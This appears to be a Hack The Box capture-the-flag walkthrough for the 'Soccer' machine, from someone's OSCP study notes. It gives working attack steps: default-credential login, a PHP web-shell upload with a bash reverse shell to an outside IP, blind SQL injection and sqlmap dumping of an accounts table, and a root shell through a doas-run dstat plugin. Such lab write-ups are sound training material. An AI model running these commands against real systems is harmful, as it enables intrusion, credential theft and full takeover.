> For the complete documentation index, see [llms.txt](https://aditya-3.gitbook.io/oscp/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://aditya-3.gitbook.io/oscp/readme/walkthroughs/hack-the-box/soccer-htb.md).

# Soccer HTB

```
Nmap scan report for 10.10.11.194
Host is up (0.041s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9091/tcp open  xmltec-xmlmail
```

The port 80 leads to a website called soccer.htb. Using gobuster we find a directory called /tiny running tiny file manager. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-440f74fb54dc46ac0da9c6bf25b60f605e9db8e9%2Fc39697f0699b3df0f73c0be6d7239408.png?alt=media) Using default creds we get in `admin:admin@123` We can upload a shell.php and use `bash -c 'bash -i >& /dev/tcp/10.10.14.37/9001 0>&1'` to get a shell: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-e829a4d92de30e1c3b4cc28f3306e69678c156f5%2Fd260e60676e5312dd19f5b0083581a43.png?alt=media) Enumerating files at /etc/nginx we find a vhost `http://soc-player.soccer.htb/check` There is a blind sql after login: It only shows true or false. So should use queries like `0 UNION select user,2,3 from mysql.user where user like 'a%'-- -` So using sqlmap: `sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3`

Now checking databases: `sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -threads 10 -dbs`

Then finding tables: `sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -threads 10 -D soccer_db --tables` Here we found accounts table

Now dumping accounts table: `sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -threads 10 -D soccer_db -T accounts --dump` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-31e775a75b7140dcab64054104cf58f8af662324%2F08dc4df0cc73c05afe784b8a2736c358.png?alt=media) Now logging in using ssh: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-60eabe4e30912e4d840b33074f762c9454d8576d%2F4449d4f53ab04d07e5e1f4c31992770f.png?alt=media)

We found a group writeable file called dstat. we also found an SUID binary called doas. It allows execution of commands as other users. To find the config file: `find / 2>/dev/null | grep doas` It seems we can run dstat as root.

Checking the plugins we can run in `/usr/share/dstat/` We can also create a plugin in`/usr/local/share/dstat` so creating a plugin called `dstat_shell.py` with

```python
import os; os.execv("/bin/sh", ["sh"])
```

Now we can run dstat plugin with `doas /usr/bin/dstat --shell` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-3aa7b2fdf20564bc7ced24c1ed7b2a7765979b20%2F96f4b91f944473bc345dfddfd56e1ebc.png?alt=media)We get a root shell.
